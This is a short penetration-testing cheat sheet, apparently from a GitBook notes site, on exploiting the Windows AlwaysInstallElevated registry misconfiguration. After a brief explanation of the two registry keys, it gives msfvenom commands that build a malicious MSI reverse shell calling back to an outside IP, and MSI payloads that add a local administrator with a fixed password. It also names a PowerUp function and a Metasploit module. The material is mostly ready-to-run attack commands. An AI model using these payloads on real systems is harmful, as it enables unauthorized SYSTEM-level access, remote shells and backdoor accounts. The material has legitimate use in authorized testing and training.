# AlwaysInstalledElevated

Windows systems are affected by a privilege escalation vulnerability when the registry keys `HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated` and `HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated` are both set to `1`. This misconfiguration allows any local user to execute Windows Installer (`.msi`) packages with elevated privileges. Exploitation is achieved by generating a malicious `.msi` payload and executing it through `msiexec`, which results in code execution as `SYSTEM`.

There are [various ways](https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#alwaysinstallelevated) to exploit this misconfiguration:

{% tabs %}
{% tab title="RevShell" %}
{% code overflow="wrap" %}

```bash
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.241 LPORT=80 -f msi -o revshell.msi
```

{% endcode %}
{% endtab %}

{% tab title="Admin User" %}
Create an admin user:

{% code overflow="wrap" %}

```bash
# Create an admin user (No UAC format)
msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi-nouac -o alwe.msi

# Create an admin user (Using the msiexec the uac wont be prompted)
msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi -o alwe.msi

# PowerUp
Write-UserAddMSI
```

{% endcode %}
{% endtab %}

{% tab title="Meterpreter" %}
If you have a meterpreter session you can automate this technique using the module:

```bash
> use exploit/windows/local/always_install_elevated
```

{% endtab %}
{% endtabs %}